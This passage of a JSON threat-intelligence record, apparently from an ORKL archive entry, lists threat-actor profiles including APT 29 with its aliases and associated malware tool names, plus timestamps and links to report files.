"e8dd54ac-a3fa-4496-8b17-a9360ad13927", "created_at": "2024-07-28T02:00:04.686094Z", "updated_at": "2026-04-10T02:00:03.680897Z", "deleted_at": null, "main_name": "Stargazer Goblin", "aliases": [], "source_name": "MISPGALAXY:Stargazer Goblin", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "821d8858-a784-4ab2-9ecb-56c7afeed7d7", "created_at": "2023-11-21T02:00:07.403629Z", "updated_at": "2026-04-10T02:00:03.479942Z", "deleted_at": null, "main_name": "SilverFish", "aliases": [], "source_name": "MISPGALAXY:SilverFish", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270", "created_at": "2022-10-25T16:07:23.341684Z", "updated_at": "2026-04-10T02:00:04.549917Z", "deleted_at": null, "main_name": "APT 29", "aliases": [ "APT 29", "ATK 7", "Blue Dev 5", "BlueBravo", "Cloaked Ursa", "CloudLook", "Cozy Bear", "Dark Halo", "Earth Koshchei", "G0016", "Grizzly Steppe", "Group 100", "ITG11", "Iron Hemlock", "Iron Ritual", "Midnight Blizzard", "Minidionis", "Nobelium", "NobleBaron", "Operation Ghost", "Operation Office monkeys", "Operation StellarParticle", "SilverFish", "Solar Phoenix", "SolarStorm", "StellarParticle", "TEMP.Monkeys", "The Dukes", "UNC2452", "UNC3524", "Yttrium" ], "source_name": "ETDA:APT 29", "tools": [ "7-Zip", "ATI-Agent", "AdFind", "Agentemis", "AtNow", "BEATDROP", "BotgenStudios", "CEELOADER", "Cloud Duke", "CloudDuke", "CloudLook", "Cobalt Strike", "CobaltStrike", "CosmicDuke", "Cozer", "CozyBear", "CozyCar", "CozyDuke", "Danfuan", "EnvyScout", "EuroAPT", "FatDuke", "FoggyWeb", "GeminiDuke", "Geppei", "GoldFinder", "GoldMax", "GraphDrop", "GraphicalNeutrino", "GraphicalProton", "HAMMERTOSS", "HammerDuke", "LOLBAS", "LOLBins", "LiteDuke", "Living off the Land", "MagicWeb", "Mimikatz", "MiniDionis", "MiniDuke", "NemesisGemina", "NetDuke", "OnionDuke", "POSHSPY", "PinchDuke", "PolyglotDuke", "PowerDuke", "QUIETEXIT", "ROOTSAW", "RegDuke", "Rubeus", "SNOWYAMBER", "SPICYBEAT", "SUNSHUTTLE", "SeaDaddy", "SeaDask", "SeaDesk", "SeaDuke", "Sharp-SMBExec", "SharpView", "Sibot", "Solorigate", "SoreFang", "TinyBaron", "WINELOADER", "WellMail", "WellMess", "cobeacon", "elf.wellmess", "reGeorg", "tDiscoverer" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434413, "ts_updated_at": 1775792253, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/9360ea522e191d1c65670d2245d2d928b6b2c123.pdf", "text": "https://archive.orkl.eu/9360ea522e191d1c65670d2245d2d928b6b2c123.txt", "img": "https://archive.orkl.eu/9360ea522e191d1c65670d2245d2d928b6b2c123.jpg" } }